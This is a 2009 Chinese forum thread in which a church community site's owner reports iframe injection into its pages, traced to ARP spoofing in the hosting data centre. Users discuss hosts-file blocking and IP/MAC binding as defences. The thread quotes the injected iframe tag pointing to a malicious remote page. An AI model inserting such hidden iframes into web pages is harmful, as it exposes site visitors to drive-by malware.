网站被挂马了,几乎每个页面都加了iframe,代码如下:
<iframe src=http://www.xxxkkkkkkk.cn/11.htm width=50 height=0></iframe>复制代码
有计算机基础的朋友,请用记事本打开C:\Windows\System32\Drivers\etc\hosts,再末尾加上:
127.0.0.1 www.xxxkkkkkkk.cn
这样在站长把病毒代码去掉以前,可以先暂时防止病毒。
使用道具 举报
这已经是这个月来的第二次了,是ARP攻击,我的头都大了。
网页并没有被镶入病毒代码,只是我们服务器所在的机房中有其他服务器对我们的服务器进行ARP攻击,模拟网关进行欺骗,拦截我们服务器的Http数据包,自动加入iframe代码,这台病毒服务器已经在中午十二点被管理员停掉了。因为今天是主日,我还要带领聚会,所以没时间处理,只能暂时关闭网站。
这次我已经换了新的ARP防火墙,不知道会不会有效。实在不行,只能购买专业的ARP防火墙了。
辛苦了~
还好只是病毒,网站平安,感谢主
哦。。。原来是ARP攻击啊?
我想你应该联系管理员,进行ip绑定,这样才能比较好地解决arp攻击。
我觉得没有购买专门的arp防火墙的必要,arp防火墙不外乎就是在第一次启动的时候查找当前的网关mac,然后记录下来。当网关mac发生改变的时候,就发出警告,截拦什么的。
专业的防火墙只是把这些工作都自动化了而已,其实你也可以让管理员给你手动绑定ip的。
谢谢弟兄的专业支持!
我不懂这些,不过就我的考虑,如果这么简单可以解决的话那个专门arp防火墙还会有市场么?还是做了就是给不懂这些的人用的?
绑定IP可以防止这个攻击,那它有没有什么不利的地方呢?
本版积分规则 发表回复 回帖后跳转到最后一页
|小黑屋|手机版|奉献支持|恩友之光 ( 桂ICP备2023005629号-1 )
GMT+8, 2024-11-8 22:41
Powered by Discuz! X3.4
© 2001-2023 Discuz! Team.
|小黑屋|手机版|奉献支持|恩友之光
( 桂ICP备2023005629号-1 )
雷达卡
发表于 2009-3-1 09:41
沉默卡
变色卡
显身卡
发表于 2009-3-1 19:15
楼主
发表于 2009-3-2 11:15